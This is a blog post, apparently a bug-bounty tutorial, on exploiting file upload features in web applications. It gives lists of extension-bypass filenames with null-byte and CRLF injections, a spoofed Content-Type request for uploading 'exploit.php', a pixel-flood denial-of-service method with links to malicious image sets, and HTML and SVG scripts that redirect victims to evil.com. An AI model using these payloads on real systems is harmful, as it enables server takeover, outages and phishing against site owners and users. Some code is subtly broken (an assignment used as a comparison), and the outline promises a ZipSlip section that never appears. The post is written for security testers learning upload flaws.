AlbusSec:- Penetration-list 02 File Upload Vulnerability — Part-1

Hello! listener’s, We hope that you’ve enjoyed our Penetration-List 01 article, Now we will learn about the File upload vulnerability that was found in an application. So, when an application gives you a functionality to upload files, it’s not a vulnerability if the application gives you the functionality to upload files because the application will now allow you to upload only Image or support-image related extension, Therefore if the server accepts some arbitrary and potentially dangerous files that could make vulnerability meaning that server does not validate things like their name, type, contents, or size of the file that makes a huge problem because the attacker could upload some shells, Attacker also binds some other vulnerability to file upload like ‘XSS via svg image file’, ‘XXE via svg image file’, ‘ open redirect via svg and SQL injection, For example, → pg_sleep(10) — .png. So, It’s a basic Introduction to File upload vulnerability. Before starting, I will introduce myself I’m Aniket, I’m an Information technology officer at 5f eco foundation of India, and also the Founder of AlbusSecurity. Now, We divide our article into some parts. In the first part, We will study File upload vulnerability, Basic Bypass Tricks, Pixel Flood Attack, and Open Redirection via a file upload. Then in our second article, we will study more about vulnerability that is Advanced Bypass Tricks, Cross-Site scripting, ZipSlip Attack, Remote Code Execution. However, In our Third article, We will make our knowledge more advanced about File upload like Server-Side-Request-Forgery(SSRF), SQL Injection, XXE Via File upload, File Over-Write. Before we will start our article, Immediately restore your chakra to make yourself concentrate, let’s get started.

File Upload Vulnerability:-

File upload Functionality gives you a function to upload some files on the application, But a Problem occurs when the application accepts all files either than the wanted file, For example:- Where a website allows a user to upload a profile pic in jpg format but the server doesn’t validate which kind of files was uploaded by the user. If that website uses PHP as a server-side language, then a hacker can write a malicious file in PHP language and upload that file into the server. So, This malicious file will allow the hacker to gain access to the webserver using a reverse shell or backdoor.

The various attacks that are possible when an application implements File Upload Functionality are as follows:-

  1. Pixel Flood Attack.
  2. Open Redirection via a file upload.
  3. Cross-Site scripting via a file upload.
  4. Remote Code Execution.
  5. ZipSlip Attack.
  6. Server-Side-Request-Forgery (SSRF).
  7. SQL Injection.
  8. XXE Via File upload.

For this article, We will learn about Basic Bypass Tricks, Pixel flood Attacks, ZipSlip attacks.

Bypass Tricks:-

When an attacker tries to upload some malicious file on an application, the attacker can’t do this because applications implement a pole apart level of protection from file upload vulnerability. So we will study some basic tricks to bypass the protection. Some Basic Bypasses techniques are following:

File Upload General Methodology:- ( Use these extensions)

  • PHP: .php, .php2, .php3, .php4, .php5, .php6, .php7, .phps, .phps, .pht, .phtm, .phtml, .pgif, .shtml, .htaccess, .phar, .inc
  • ASP: .asp, .aspx, .config, .ashx, .asmx, .aspq, .axd, .cshtm, .cshtml, .rem, .soap, .vbhtm, .vbhtml, .asa, .cer, .shtml
  • Jsp: .jsp, .jspx, .jsw, .jsv, .jspf, .wss, .do, .action

Note:- You can also using Case sensitive Tricks:- .pHP5, .aSp, .jSp

For more information about other extensions then Check our Penetration-List-on Github:-

https://github.com/AlbusSec/Penetration-List/blob/main/File-Upload%20-02/Extensions/Single-Extensions-File.txt

Double-Extension:-

Adding some valid extension before malicious extension.

  • test.png.php
  • test.png.xml
  • test.png.html
  • test.png.php4
  • test.png.php5
  • test.png.py

For more double extensions check our Penetration-List on Github:

https://github.com/AlbusSec/Penetration-List/blob/main/File-Upload%20-02/Extensions/Double-Extension-File.txt

Triple-Extension:-

Same as double-Extensions

  • test.jpg.png.php
  • test.jpg.png.xml
  • test.jpg.png.html
  • test.jpg.png.php4
  • test.jpg.png.php5
  • test.jpg.png.py
  • test.jpg.png.js
  • test.jpg.png.sh

For more Triple extensions check our Penetration-List on Github:

https://github.com/AlbusSec/Penetration-List/blob/main/File-Upload%20-02/Extensions/Triple-Extension-File.txt

Adding junk(Null bytes):-

Single-Extension:-

  • test.php%00
  • test.Py./
  • test.sh%0d%0a
  • test.js\x00
  • test.php4./%00
  • test.asP%0a

Double-Extension:-

  • test.png.php
  • test.phP%00.png
  • test.pHp\x00.png
  • test.php%0a.png
  • test.php%0d%0a.png
  • test.pyJunk123png
  • test.sh./%00.png

Triple-Extension’s:-

  • file.png.jpg.php
  • file.php%00.png%00.jpg
  • test.pHp\x00.png%0d%0a.jpg
  • test.php%0a.png./%00.png
  • test.php%0d%0a.png%0a.jpg
  • test.pyJunk123png.%00gif
  • test.sh./%00.png.\x00csv

You can use Burpsuite to brute force all these encoded extensions, But you need a list for this. Don’t worry we have a list for this also in our Penetration-List on Github:

https://github.com/AlbusSec/Penetration-List/tree/main/File-Upload%20-02/Null-bytes-Extensions

Content-Type Bypass:-

Content-Type is also known as MIME (Multipurpose Internet Mail Extension)Type. It is an HTTP Header that tells the server what you are sending to the browser. Problems can arise when the value of this header is Fully trusted by the server. The mean server only depends upon only Content-Type header rather than no other protection was implemented by the server, Then this protection is easily bypassed by an attacker. But how? Let’s take an example:- Attacker try to upload a PHP file but the server doesn’t accept that file because the server implement some protection through file upload vulnerability, then Attacker will try some bypass tricks against the server, So he changes the Content-Type header value from like this

Original Request:-

Content-Disposition: form-data; name=”avatar”; filename=”exploit.php”
Content-Type:application/octet-stream

Malicious Request:-

Content-Disposition: form-data; name=”avatar”; filename=”exploit.php”
Content-Type: image/png

Now, You can also use some other Content-Type header values. So, for this, check this:-

https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/web-all-content-types.txt

Pixel Flood Attack:-

Pixel Attack is a very simple attack because you just need an image that pixel is very large, To find this attack on the application. Whenever you see a file upload functionality accepting images, then you upload a Malicious image(For pixel attack you just need to set your pixel up to 6500x6590px)Whenever you upload a file on the server then you see that server then the server can’t handle it because the server can’t take any kind of protection about image pixels, Overall this scenario leads to a simple application-level denial of service.

To exploit Pixel Flood Attack, Follow these some fellow steps:-

  • Firstly, You need a large pixel image and for this, you can also use some CLI tool’s, Gui tools, But, Most simple way, check this repo:

https://github.com/fuzzdb-project/fuzzdb/tree/master/attack/file-upload/malicious-images

  • Second, Upload your Malicious image, Whenever you see that the server starts crashing means that’s the application became inaccessible for more clarity try to access the application from another device if you can’t boom !! report it

A few months ago, I have reported the same vulnerability to BlueSnap, However, I got a duplicate report. The reason is that Pixel Flood is very easy, so everyone wants an easy win

Open Redirection via a file upload:-

I hope you all know about open redirection though I will explain to you in short, A web application accepts a user-controlled input that specifies a link to an external site, Then the server redirects the user to the attacker domain, Open redirection is used to perform phishing. Exactly when an application allows uploading files such as HTML and svg for this we will craft some malicious code on file and then when the attacker opens that file they will be redirected to the entered domain. For example:-
An attacker will make an HTML file on that HTML file below code was entered on It.

For HTML →

<script>
if (top.location.host =”Website-name”) {
window.location.href=”https://evil.com"
}
</script>

For SVG →

<svg version=”1.1" baseProfile=”full” xmlns=”http://www.w3.org/2000/svg">
<polygon id=”triangle” points=”0,0 0,50 50,0" fill=”#009900" stroke=”#004400"/>
<script>
window.location.href=”https://evil.com"
</script>
</polygon>
</svg>

Then the attacker will successfully upload that file. So, when the attacker opens that file he will be redirected to entered domain. Also, you can check our penetration list to get these Files:-

https://github.com/AlbusSec/Penetration-List/tree/main/File-Upload%20-02/Open%20redirection%20via%20File%20upload

Yepp!!! We complete our First article on file upload vulnerability, Wait for the second article because that article contains more advanced things like Remote Code Execution(RCE), Cross-Site-ScriptingXSS, Advanced bypass tricks, Zipslap Attack. We will work hard to achieve more accomplishments. Thank you for reading.

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store